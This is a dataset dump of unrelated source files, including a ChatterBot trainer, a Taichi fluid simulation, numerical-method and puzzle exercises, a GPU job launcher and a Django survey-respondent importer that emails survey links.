args['-o']))\n envelopes_cmd()\n elif args[\"wip\"]:\n print(\"Work in progress command...\")\n wip_cmd()\n elif args[\"new_db\"]:\n print(\"Creating a modified data base...\")\n new_db_cmd()\n else:\n print(\"You've failed to select a command.\")\n print(\"Try ./utils.py ? # brief! 
or ...\")\n print(\" ./utils.py -h # for more detail or ...\")\n print(\" ./utils.py -h | pager # to catch it all.\")\n\nNOTE = \"\"\"\nemailing_cmd()\n uses Club.traverse_records(infile,\n club.send_attachment(args[\"-i\"]))\n\"\"\"\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":49047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643710196","text":"import os\nimport sys\nfrom chatterbot.trainers import ListTrainer\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom common import mymysql\nfrom common import fenci\nfrom chatterbot import ChatBot\nimport logging\nimport operator\nimport time\nsetup_logging()\nlogger = logging.getLogger(\"root\")\n\n\ndef initcbot(kbname, onlyread=False):\n try:\n cbot = ChatBot('ai_%s' % kbname,\n storage_adapter=CHATTERBOT['storage_adapter'],\n filters=['chatterbot.filters.RepetitiveResponseFilter'],\n database_uri=KGDATABASES['database_uri'],\n database='ai_%s' % kbname,\n read_only=onlyread, )\n # logger.info(self._Chatbot)\n except Exception as msg:\n logger.info('Failure to initialize Chatterbot.', exc_info=True)\n logger.error(msg)\n\n\ndef preprocess(self, sentence, companyid=None):\n if ISFENCI:\n if ISSYMS:\n return fenci.symp_sentence(sentence, companyid)\n else:\n return sentence\n else:\n return sentence\n\n\ndef trainkb(conn,kbname):\n cbot = initcbot(kbname)\n try:\n logger.info(\"start set trainer\")\n cbot._Chatbot.set_trainer(ListTrainer)\n except Exception as msg:\n logger.error(msg)\n logger.info(\"start set trainer\")\n a = 0\n param = (kbname.split(\"_\")[0])\n selectresult = mymysql.myselectqas(conn, param)\n company_id = mymysql.myselectcpid(conn, param)\n logger.debug('start training the knowdata: %s and the companyid: %s.' % (kbname, company_id[0]))\n b = len(selectresult)\n for row in selectresult:\n answer = \"%s@%s\" % (row[2], row[0])\n question = preprocess(row[1], company_id[0])\n cbot.train([question, answer])\n logger.debug('Train: %d, %s --> %s.' % (a, question, answer))\n a = a + 1\n\n if a >= b:\n logger.info('success training.')\n return True\n else:\n logger.info('failure training.')\n return False\n\n\ndef addtraintaskMonitor(conn, traindata):\n param = (traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 0)\n temp_status = mymysql.myselectstatus(conn, param)\n if operator.ne(traindata, 'Null') and temp_status[0] == 3:\n logger.debug('Watch %s need to train ' % (traindata,))\n param = (1, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 3)\n paramkg = (1, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 0)\n logger.info('untrained kb %s is ready to train in mysql' % traindata.split(\"_\")[0])\n if mymysql.myupdate(conn, param):\n logger.info('untrained kb %s in mysql turns from status 3 to 1.' % traindata.split(\"_\")[0])\n mymysql.myupdatekg(conn, paramkg)\n logger.info('knowgraphs with kb %s, version %s in mysql turns from train_state 0 to 1.' % traindata)\n if trainkb(traindata):\n param = (2, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 1)\n if mymysql.myupdate(conn, param):\n logger.info('mission kb %s in mysql turns from status 1 to 2.' % traindata.split(\"_\")[0])\n mymysql.myupdatekg(conn, param)\n logger.info('knowgraphs with kb %s, version %s in mysql turns from train_state 1 to 2.' 
% traindata)\n logger.info('success to train.')\n else:\n logger.info('failure to train')\n param = (0, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 1)\n if mymysql.myupdate(conn, param):\n logger.info('mission kb %s in mysql turns from status 1 to 0.' % traindata.split(\"_\")[0])\n mymysql.myupdatekg(conn, param)\n logger.info('knowgraphs with kb %s, version %s in mysql turns from train_state 1 to 0.' % traindata)\n mymysql.myclose(conn)\n\n\ndef startMonitorMySQL(conn):\n train_tasks = []\n param = (0, 0)\n selectresult = mymysql.myselect(conn, param)\n for row in selectresult:\n if str(row[1]).isdigit():\n train_tasks.append(\"%s_%s\" % (row[0], row[1]))\n logger.info('current train tasks is %s from mysql.' % train_tasks)\n return train_tasks\n\n\ndef changemissiontraining(conn, traindata):\n param = (3, traindata.split(\"_\")[0], traindata.split(\"_\")[-1], 0)\n logger.debug('untrained kb %s is ready for train' % (traindata.split(\"_\")[0],))\n return mymysql.myupdate(conn, param)\n\n\ndef mymonitorabox():\n conn = mymysql.myconnect(KBDATABASES)\n logger.info('start to tarin with main')\n datas = startMonitorMySQL(conn)\n if datas:\n for traindata in datas:\n if changemissiontraining(conn,traindata):\n addtraintaskMonitor(conn, traindata)\n time.sleep(20)\n\n\nif __name__ == '__main__':\n logger.info('start monitor for db training tasks.')\n while True:\n mymonitorabox()\n time.sleep(20)","sub_path":"trainbox/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471689658","text":"#!/usr/bin/python3\nimport sympy\nimport math\nfrom prettytable import PrettyTable\n\ndef fakeRule(xi, xs, tol, ite):\n errorRela.append(\"\")\n tXi.append(xi)\n tXs.append(xs)\n if (tol >= 0):\n if (ite > 0):\n yi = function.evalf().subs({x:xi}).evalf()\n if (yi != 0):\n ys = function.evalf().subs({x:xs}).evalf()\n if (ys != 0):\n if (yi*ys < 0):\n xm = xi - ((yi*(xs-xi))/(yi-ys))\n tXm.append(xm)\n ym = function.evalf().subs({x:xm}).evalf()\n tfXm.append(ym)\n error = tol + 1\n cont = 1\n tIter.append(cont)\n\n while((ym != 0) and (error > tol) and (cont < ite)):\n if yi*ym < 0:\n xs = xm\n ys = ym\n else:\n xi = xm\n yi = ym\n tXs.append(xs)\n tXi.append(xi)\n xaux = xm\n xm = xi - ((yi*(xs-xi))/(yi-ys))\n tXm.append(xm)\n ym = function.evalf().subs({x:xm}).evalf()\n tfXm.append(ym)\n error = math.fabs(xm - xaux)\n errorRela.append(error/xm)\n cont = cont + 1\n tIter.append(cont)\n \n if(ym == 0):\n print (str(xm) + \" is an aproximate root\")\n elif(error < tol):\n print (str(xaux) + \" is an aproximate root\")\n else:\n print (\"Failed!\")\n else:\n print (\"Failed the interval!\")\n else:\n print (str(xs) + \"is a root\")\n else:\n print (str(xi) + \" is a root\")\n else:\n print (\"Wrong iterates!\")\n else:\n print (\"Tolerance < 0\")\n table.add_column(\"n\",tIter)\n table.add_column(\"Xi\",tXi)\n table.add_column(\"Xs\",tXs)\n table.add_column(\"Xm\",tXm)\n table.add_column(\"f(Xm)\",tfXm)\n table.add_column(\"Error Relativo\",errorRela)\n print(table)\n \nif __name__ == \"__main__\":\n x = sympy.Symbol('x')\n symbols = {'e':math.e,'cos':sympy.cos,'sin':sympy.sin,'ln':sympy.ln}\n function = input(\"Enter the function : \")\n function = sympy.sympify(function,locals =symbols)\n xi = float(input(\"Enter the first point: \"))\n xs = float(input(\"Enter the last point: \"))\n tol = float(input(\"Enter the tolerance: \"))\n ite = int(input(\"Enter N iteraters: \"))\n table 
= PrettyTable()\n tIter = []\n tXi = []\n tXs = []\n tXm = []\n tfXm = []\n errorRela = []\n fakeRule(xi, xs, tol, ite)","sub_path":"OneVariable/FalsePositionMethod/falsePositionMethod.py","file_name":"falsePositionMethod.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220275771","text":"\nimport random\nimport webapp2\n\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import images\nfrom google.appengine.api import mail\nfrom google.appengine.api import users\nfrom google.appengine.ext import blobstore\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import blobstore_handlers\n\nfrom models import Employee as Emp\nfrom models import Role\nfrom models import Project as Prj\nfrom querydefs import JinjaEnv\nfrom querydefs import QueryDefs\n\nDEFAULT_BUCKET = app_identity.get_default_gcs_bucket_name()\nDEFAULT_FOLDER = 'userpics'\n\nclass AdminAddUser(webapp2.RequestHandler):\n \"\"\"Handler for adding users.\"\"\"\n def get(self):\n \"\"\"Presents form for adding a user.\"\"\"\n employee = Emp.query(\n Emp.user_id == users.get_current_user().user_id()\n ).get()\n\n jinjaenv = JinjaEnv()\n template = jinjaenv.get_jinja_env().get_template(\n 'templates/admin/adduser.html'\n )\n bucket_name = '/gs/%s/%s' % (DEFAULT_BUCKET, DEFAULT_FOLDER)\n qd = QueryDefs()\n template_values = {\n 'employee': employee,\n 'projects': qd.get_all_project_nameid(),\n 'roles': qd.get_all_roles_nameid(),\n 'upload_url': blobstore.create_upload_url('/action/admin/adduser/', gs_bucket_name=app_identity.get_default_gcs_bucket_name()),\n 'is_admin': users.is_current_user_admin(),\n 'url_link': users.create_logout_url('/')\n }\n\n self.response.write(template.render(template_values))\n\n\nclass AdminUploadUser(blobstore_handlers.BlobstoreUploadHandler):\n def post(self):\n \"\"\"Add an Employee entity to the datastore.\"\"\"\n file_info = self.get_file_infos()[0]\n email = self.request.get('email')\n projects = []\n\n for project in self.request.get_all('prj_id'):\n projects.append(ndb.Key(Prj, int(project)))\n\n new_employee = Emp(\n employee_id=str(random.getrandbits(68)).zfill(21),\n first_name=self.request.get('first_name'),\n last_name=self.request.get('last_name'),\n email=email,\n phone=self.request.get('phone'),\n #photo=gs_object_name,\n photo=file_info.gs_object_name,\n role=ndb.Key(Role, int(self.request.get('role_id'))),\n rejected_num=0,\n projects=projects,\n )\n new_employee.put()\n\n # Notify new user of account creation\n \"\"\"\n sender_address = \"jmooretestdev@appspot.gserviceaccount.com\"\n user_address = email\n subject = \"Welcome to the Taos Timesheet Application\"\n body = \"Greetings \" + new_employee.first_name + \", and welcome to the new Taos Timesheet Application.\"\n mail.send_mail(sender_address, user_address, subject, body)\n \"\"\"\n self.redirect('/view/admin/users/')\n","sub_path":"handlers/adminadduser.py","file_name":"adminadduser.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606506110","text":"\n\nfrom xai.brain.wordbase.nouns._shit import _SHIT\n\n#calss header\nclass _SHITTING(_SHIT, ):\n\tdef __init__(self,): \n\t\t_SHIT.__init__(self)\n\t\tself.name = \"SHITTING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"shit\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_shitting.py","file_name":"_shitting.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617767500","text":"import taichi as ti\nimport numpy as np\nimport random\nimport time\n\nreal = ti.f32\ndim = 2\nn_particles = 8192 * 4\nn_grid = 256\ndx = 1 / n_grid\ninv_dx = 1 / dx\ndt = 2.0e-4\np_vol = (dx * 0.5) ** 2\np_rho = 1\np_mass = p_vol * p_rho\nE = 100\n\nscalar = lambda: ti.var(dt=real)\nvec = lambda: ti.Vector(dim, dt=real)\nmat = lambda: ti.Matrix(dim, dim, dt=real)\n\nx, v = vec(), vec()\ngrid_v, grid_m = vec(), scalar()\nC, J = mat(), scalar()\n\n# ti.cfg.arch = ti.x86_64\nti.cfg.arch = ti.cuda\n# ti.cfg.verbose_kernel_launches = True\n# ti.cfg.default_gpu_block_dim = 32\n\n@ti.layout\ndef place():\n ti.root.dense(ti.k, n_particles).place(x, v, J, C)\n ti.root.dense(ti.ij, n_grid).place(grid_v, grid_m)\n\n\n@ti.kernel\ndef clear_grid():\n for i, j in grid_m:\n grid_v[i, j] = [0, 0]\n grid_m[i, j] = 0\n\n\n@ti.kernel\ndef p2g():\n for p in x:\n base = ti.cast(x[p] * inv_dx - 0.5, ti.i32)\n fx = x[p] * inv_dx - ti.cast(base, ti.f32)\n w = [0.5 * ti.sqr(1.5 - fx), 0.75 - ti.sqr(fx - 1),\n 0.5 * ti.sqr(fx - 0.5)]\n stress = -dt * p_vol * (J[p] - 1) * 4 * inv_dx * inv_dx * E\n affine = ti.Matrix([[stress, 0], [0, stress]]) + p_mass * C[p]\n for i in ti.static(range(3)):\n for j in ti.static(range(3)):\n offset = ti.Vector([i, j])\n dpos = (ti.cast(ti.Vector([i, j]), ti.f32) - fx) * dx\n weight = w[i](0) * w[j](1)\n grid_v[base + offset].atomic_add(weight * (p_mass * v[p] + affine @ dpos))\n grid_m[base + offset].atomic_add(weight * p_mass)\n\n\nbound = 3\n\n\n@ti.kernel\ndef grid_op():\n for i, j in grid_m:\n if grid_m[i, j] > 0:\n inv_m = 1 / grid_m[i, j]\n grid_v[i, j] = inv_m * grid_v[i, j]\n grid_v(1)[i, j] -= dt * 9.8\n if i < bound and grid_v(0)[i, j] < 0:\n grid_v(0)[i, j] = 0\n if i > n_grid - bound and grid_v(0)[i, j] > 0:\n grid_v(0)[i, j] = 0\n if j < bound and grid_v(1)[i, j] < 0:\n grid_v(1)[i, j] = 0\n if j > n_grid - bound and grid_v(1)[i, j] > 0:\n grid_v(1)[i, j] = 0\n\n\n@ti.kernel\ndef g2p():\n for p in x:\n base = ti.cast(x[p] * inv_dx - 0.5, ti.i32)\n fx = x[p] * inv_dx - ti.cast(base, ti.f32)\n w = [0.5 * ti.sqr(1.5 - fx), 0.75 - ti.sqr(fx - 1.0),\n 0.5 * ti.sqr(fx - 0.5)]\n new_v = ti.Vector([0.0, 0.0])\n new_C = ti.Matrix([[0.0, 0.0], [0.0, 0.0]])\n\n for i in ti.static(range(3)):\n for j in ti.static(range(3)):\n dpos = ti.cast(ti.Vector([i, j]), ti.f32) - fx\n g_v = grid_v[base(0) + i, base(1) + j]\n weight = w[i](0) * w[j](1)\n new_v += weight * g_v\n new_C += 4 * weight * ti.outer_product(g_v, dpos) * inv_dx\n\n v[p] = new_v\n x[p] += dt * v[p]\n J[p] *= 1 + dt * new_C.trace()\n C[p] = new_C\n\ngui = ti.core.GUI(\"MPM\", ti.veci(512, 512))\ncanvas = gui.get_canvas()\n\n@ti.kernel\ndef copy_x(pos: ti.ext_arr()):\n for i in range(n_particles):\n pos[i * 2] = x[i][0]\n pos[i * 2 + 1] = x[i][1]\n\ndef main():\n for i in range(n_particles):\n x[i] = [random.random() * 0.4 + 0.2, random.random() * 0.4 + 0.2]\n v[i] = [0, -1]\n J[i] = 1\n\n for f in range(200):\n canvas.clear(0x112F41)\n t = time.time()\n for s in range(150):\n clear_grid()\n p2g()\n grid_op()\n g2p()\n print('{:.1f} ms per frame'.format(1000 * (time.time() - t)))\n\n pos = np.empty((2 * n_particles), dtype=np.float32)\n copy_x(pos)\n for i in range(n_particles):\n # canvas.circle(ti.vec(x[i][0], x[i][1])).radius(1).color(0x068587).finish()\n \n # Python binding 
here is still a bit slow...\n canvas.circle(ti.vec(pos[i * 2], pos[i * 2 + 1])).radius(1).color(0x068587).finish()\n gui.update()\n ti.profiler_print()\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/mpm_fluid.py","file_name":"mpm_fluid.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133349065","text":"from enum import Enum\n\n\nclass filterChoices(Enum):\n CONTAINS = 'contains'\n NOT_CONTAINS = 'notcontains'\n EQUAL = 'equal'\n NOT_EQUAL = 'notequal'\n GREATER_THAN = 'greater_than'\n GREATER_THAN_EQUAL_TO = 'greater_than_equal_to'\n LESS_THAN = 'less_than'\n LESS_THAN_EQUAL_TO = 'less_than_equal_to'\n BEGIN_WITH = 'begin_with'\n NOT_BEGIN_WITH = 'not_begin_with'\n END_WITH = 'end_with'\n NOT_END_WITH = 'not_end_with'\n EARLIEST = 'earliest'\n LATEST = 'latest'\n BETWEEN = 'between'\n NOT_BETWEEN = 'notbetween'\n\n def __str__(self):\n return self.value\n","sub_path":"pyplan/pyplan/common/classes/filterChoices.py","file_name":"filterChoices.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522606762","text":"import sys\nsys.stdin = open('inpu.txt', 'r')\n\ndef mag_st(i, j):\n global result\n if i < 99:\n if base[i][j] == 1 and base[i+1][j] == 2:\n result += 1\n return\ndef magnet_movement(i, j):\n global result\n dy = [1, -1]\n y = i\n if base[i][j] == 1:\n while (y + dy[0]) < 99:\n if base[y + dy[0]][j] == 0:\n # print(y)\n base[y][j] = 0\n # print('base',y + dy[0], j)\n base[y + dy[0]][j] = 1\n y += dy[0]\n else:\n break\n elif base[i][j] == 2:\n while base[y + dy[1]][j] == 0 and y + dy[1] > 0:\n base[y][j] = 0\n base[y + dy[1]][j] = 2\n y += dy[1]\n\ntestcase = 10\nfor tcnum in range(1, testcase + 1):\n stst = []\n result = 0\n base_len = int(input())\n base = [0] * 100\n for i in range(100):\n base[i] = list(map(int, input().split()))\n\n for i in range(100):\n for j in range(100):\n magnet_movement(i, j)\n for i in range(100):\n for j in range(100):\n mag_st(i, j)\n\n\n\n\n print('#{} {}'.format(tcnum, result))","sub_path":"algorithm_practice/1220_magnet.py","file_name":"1220_magnet.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36579086","text":"\r\n## arrInt = [1, 34, 5, 6] ## Example 1\r\narrInt = [1, 24, 51, 60] ## Example 2\r\n\r\narrOutput = []\r\n\r\nfor nLoop in arrInt:\r\n arrOutput = arrOutput + [int(strElem) for strElem in str(nLoop)]\r\n\r\nprint (arrOutput)\r\n","sub_path":"challenge-230/eric-cheung/python/ch-1.py","file_name":"ch-1.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"214480091","text":"with open('input.txt') as f:\n input = [line.strip() for line in f]\n\ndef closest_intersection(wire1, wire2):\n intersections = set(wire1).intersection(set(wire2))\n return min(wire1[loc] + wire2[loc] for loc in intersections)\n\ndef coordinations(input):\n input = input.split(',')\n coord = {}\n x = y = num_steps = 0\n for point in input:\n direction = point[0]\n distance = int(point[1:])\n for _ in range(distance):\n num_steps += 1\n if direction == 'U':\n y += 1\n elif direction == 'D':\n y -= 1\n elif direction == 'R':\n x += 1\n elif direction == 'L':\n x -= 1\n else:\n raise RuntimeError(f\"bad direction: {direction}\")\n loc = (x,y)\n if loc not in coord:\n 
coord[loc] = num_steps\n return(coord)\n\nwire1 = coordinations(input[0])\nwire2 = coordinations(input[1])\nprint(closest_intersection(wire1, wire2))\n","sub_path":"day03/day3b.py","file_name":"day3b.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"22329934","text":"import numpy as np\nimport cv2\n\n# defining our own canvas with numpy arrays!\ncanvas = np.zeros((300, 300, 3), dtype=\"uint8\") # (0,0,0) is black\ncv2.imshow(\"Canvas\", canvas)\n\n'''drawing lines'''\ngreen = (0, 255, 0)\ncv2.line(canvas, (0, 0), (300, 300), green)\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\nred = (0, 0, 255)\ncv2.line(canvas, (300, 0), (0, 300), red, 3) # last one is thickness - 3 pixels\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\n'''drawing rectangles'''\ncv2.rectangle(canvas, (10,10), (60,60), green) # specify start and end of rect's diagonal \ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\ncv2.rectangle(canvas, (50,10), (250,60), red, -7) # negative value to have a filled in rectangle\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\n'''drawing circles'''\ncanvas = np.zeros((300, 300, 3), dtype = \"uint8\") # refresh canvas\nwidth, height, channels = canvas.shape\ncenterX, centerY = width//2, height//2\n\n# cv2.circle(canvas, (centerX, centerY), 40, red)\n# cv2.imshow(\"Canvas\", canvas)\n# cv2.waitKey(0)\n\n# drawing a bullseye\nfor radius in range(20, 150, 30):\n cv2.circle(canvas, (centerX, centerY), radius, red)\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n\n#abstract art! Drawing 25 random circles\ncanvas = np.zeros((300, 300, 3), dtype = \"uint8\") # refresh canvas\nfor _ in range(25) :\n radius = np.random.randint(0, high = 200)\n color = np.random.randint(0, high = 255, size = 3).tolist()\n center = tuple(np.random.randint(0, 300, size = 2).tolist())\n cv2.circle(canvas, center, radius, color, -1) # negative thickness to fill\ncv2.imshow(\"Canvas\", canvas)\ncv2.waitKey(0)\n","sub_path":"3_drawing.py","file_name":"3_drawing.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358912992","text":"class Solution:\n # @param ratings, a list of integer\n # @return an integer\n def candy(self, ratings):\n ret = [1] * len(ratings)\n for i in range(1,len(ratings)):\n if ratings[i] > ratings[i-1]:\n ret[i] = ret[i-1] + 1\n ret2 = [1] * len(ratings)\n for i in range(len(ratings)-2,-1,-1):\n if ratings[i] > ratings[i+1]:\n ret2[i] = ret2[i+1] + 1\n return sum([max(ret[i],ret2[i]) for i in range(len(ratings))])","sub_path":"leetcode/candy.py","file_name":"candy.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597508927","text":"class Node:\n def __init__(self,data,next,prev):\n self.data = data\n self.next = next\n self.prev = prev\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_begining(self,data):\n if self.head == None :\n node = Node(data,self.head,self.head)\n self.head = node\n return\n node = Node(data,self.head,None)\n self.head.prev = node\n self.head = node\n return\n\n def print_forward(self):\n if self.head == None:\n print(\"No element\")\n return\n itr = self.head\n liststr = ''\n while itr:\n liststr += str(itr.data)+\"--->\"\n itr = itr.next\n\n print(liststr)\n\n def get_length(self):\n count = 0\n if self.head == None:\n return count\n itr = 
self.head\n while itr:\n itr = itr.next\n count += 1\n return count\n\n def print_backward(self):\n if self.head == None:\n print(\"No element\")\n return\n itr = self.head\n liststr = ''\n while itr.next:\n itr = itr.next\n while itr:\n liststr += str(itr.data)+\"--->\"\n itr = itr.prev\n print(liststr)\n\n def insert_element(self, items):\n for listitem in items:\n self.insert_begining(listitem)\n\nif __name__ == \"__main__\":\n ll = LinkedList()\n ll.insert_element([12,13,14,15,46])\n ll.print_backward()\n ll.print_forward()","sub_path":"DoubleLinkList.py","file_name":"DoubleLinkList.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271449830","text":"import matplotlib.pyplot as plt\nimport time\nimport jittens\nfrom . import vast, data\nimport pandas as pd\nfrom logging import getLogger\nfrom pavlov import runs, stats\nimport ast\nfrom IPython import display\n\nlog = getLogger(__name__)\n\ndef acknowledged(desc):\n fresh = [j.params for j in jittens.jobs.jobs('fresh').values()]\n active = [j.params for j in jittens.jobs.jobs('active').values()]\n\n rs = runs.pandas().loc[lambda df: df.description == desc]\n fetched = [ast.literal_eval(r['JITTENS_PARAMS']) for _, r in rs._env.iteritems()]\n\n return fresh + active + fetched\n\ndef keystr(d):\n return str({k: d[k] for k in ('boardsize', 'width', 'depth', 'timelimit')})\n\ndef is_missing(proposal, acks):\n return keystr(proposal) not in {keystr(a) for a in acks}\n\ndef launch():\n boardsize = 9\n limits = {3: 10, 5: 30, 7: 90, 9: 180}\n desc = f'main/{boardsize}'\n acks = acknowledged(desc)\n for width in [64, 128, 256, 512, 1024]:\n for depth in [1, 2, 4, 8, 16, 32]:\n params = dict(width=width, depth=depth, boardsize=boardsize, timelimit=limits[boardsize]*60, desc=desc)\n if is_missing(params, acks):\n log.info(f'Launching {params}')\n jittens.jobs.submit(\n cmd='python -c \"from boardlaw.main import *; run_jittens()\" >logs.txt 2>&1',\n dir='.',\n resources={'gpu': 1},\n params=params)\n\ndef fetch():\n return jittens.manage.fetch('output/pavlov/', 'output/pavlov/')\n\ndef refresh():\n vast.jittenate(local=True, ssh_accept=True)\n last_fetch = 0\n while not jittens.finished():\n try:\n display.clear_output(wait=True)\n jittens.refresh()\n time.sleep(15)\n\n if time.time() > last_fetch + 600:\n fetched = fetch()\n jittens.manage.cleanup(fetched)\n last_fetch = time.time()\n except Exception as e:\n log.info(f'Failed with error {e}')\n time.sleep(60)\n\n fetched = fetch()\n jittens.manage.cleanup(fetched)\n\ndef progress():\n active_jobs = jittens.jobs.jobs('active')\n active_runs = runs.pandas()._env.dropna().apply(lambda p: p.get('JITTENS_NAME', '') in active_jobs).pipe(lambda s: s.index[s])\n keys = runs.pandas().loc[active_runs, 'params'].apply(lambda p: (p['boardsize'], p['width'], p['depth']))\n return data.load_field('elo-mohex', 'μ').resample('1min').mean().bfill().notnull().sum().reindex(keys.values)\n\ndef offers():\n vast.offers('cuda_max_good >= 11.1 & gpu_name == \"RTX 2080 Ti\"')","sub_path":"grid/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285702331","text":"'''\nComplete the following 3 searching problems using techniques\nfrom class and from Ch15 of the textbook website\n'''\nimport re\n\n# 1. (6pts) Write code which finds and prints the longest\n# word in the provided dictionary. 
If there are more\n# than one longest word, print them all.\nlength = []\ndictionary = []\n\n\ndef split_line(line):\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\n\n\nfile = open(\"../Searching/dictionary.txt\")\n\nfor line in file:\n line = line.strip()\n words = split_line(line)\n for word in words:\n dictionary.append(word)\n length.append([len(word), word])\n\nlength.sort()\nprint(length[len(length) - 1])\n\n# 2. (8pts) Write code which finds\n# The total word count AND average word length\n# in \"AliceInWonderLand.txt\"\nword_length = 0\naliceinwonderland = []\nfile = open(\"../Searching/AliceInWonderLand.txt\")\n\nfor line in file:\n line = line.strip()\n words = split_line(line)\n for word in words:\n aliceinwonderland.append(word)\n word_length += len(word)\n\nprint(len(aliceinwonderland))\nprint(word_length / len(aliceinwonderland))\n\n# CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS\n\n# 3 (12pts) How many times does \"Cheshire\" occur in\"AliceInWonderLand.txt\"?\n# How many times does \"Cat\" occur?\n# How many times does \"Cheshire\" immediately followed by \"Cat\" occur?\nfollow = 0\n\n\ndef find(aliceinwonderland, word):\n for i, ltr in enumerate(aliceinwonderland):\n if ltr == word:\n yield i\n\n\nrepeat = list(find(aliceinwonderland, \"Cheshire\"))\nrepeatc = list(find(aliceinwonderland, \"Cat\"))\nprint(len(repeat))\nprint(len(list(find(aliceinwonderland, \"Cat\"))))\nprint(repeat)\nprint(repeatc)\nfor i in range(len(repeat)):\n if (repeat[i] + 1) in repeatc:\n follow += 1\n\nprint(follow)\n#### OR #####\n\n# 3 (12pts)Find the most frequently occurring\n# seven letter word in \"AliceInWonderLand.txt\"\n\n# Challenge problem (for fun). What words appear in the text of \"Alice in Wonderland\" that DO NOT occur in \"Alice Through the Looking Glass\". Make a list. 
You can substitute this for any of the above problems.\n","sub_path":"Homework/Searching/search_problems.py","file_name":"search_problems.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425026945","text":"from django_backend.settings import EMAIL_HOST_USER\nfrom django.core.mail import send_mail\nimport csv\nimport io\n\nfrom ..models import Respondent, SurveyResponse\n\ndef import_respondents(excel_file, eseaaccount, survey):\n decoded_file = excel_file.read().decode('utf-8')\n io_string = io.StringIO(decoded_file)\n\n colsdict = {}\n respondents = []\n requiredattributes = {'email', 'first_name', 'last_name', 'last_name_prefix'}\n\n for i, row in enumerate(csv.reader(io_string, delimiter=',', quotechar='|')):\n if (i == 0):\n row = [x.lower() for x in row]\n print(row)\n missingattributes = requiredattributes.difference(set(row))\n \n if missingattributes:\n return \"Your csv file is missing the following attribute columns: \" + \", \".join(missingattributes)\n for j, column in enumerate(row):\n colsdict[column] = j\n else:\n try:\n email =row[colsdict['email']]\n firstname = row[colsdict['first_name']]\n lastnameprefix = row[colsdict['last_name_prefix']]\n lastname = row[colsdict['last_name']]\n respondent = Respondent(organisation=eseaaccount.organisation, email=email, first_name=firstname, last_name_prefix=lastnameprefix, last_name=lastname)\n print(respondent)\n respondents.append(respondent)\n except:\n return f\"error in row {i}: {row}\"\n for respondent in respondents:\n respondent.save()\n new_survey_response = SurveyResponse.objects.create(survey=survey, respondent=respondent, esea_account=eseaaccount)\n print(f'{respondent}: {new_survey_response.token}')\n subject = f\"Survey for {respondent} regarding {respondent.organisation}\"\n message = f\"Hi {respondent}!\\nWe would like you to take a moment to fill in the following survey as employee of {respondent.organisation} to create a report about the organisation's position in the ethical, social and environmental fields.\\n\\n https://esea.herokuapp.com/survey-fill/{new_survey_response.token}/\" # http://localhost:8080/\n # recepient = respondent.email\n recepient = \"seriousdeejay@gmail.com\"\n send_mail(subject, message, EMAIL_HOST_USER, [recepient], fail_silently = False)\n break\n return \"The Survey has been succesfully deployed to the provided survey respondents.\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''\n eseaaccount = get_object_or_404(EseaAccount, pk=eseaaccount_pk)\n colsdict = {}\n requiredattributes = {'email', 'first_name', 'last_name', 'last_name_prefix'}\n respondents = []\n\n with open(os.path.join(os.getcwd(), \"core\\\\uploadedfiles\\\\uploadedemployees.csv\")) as file:\n #maybe quotechar should be , ?\n 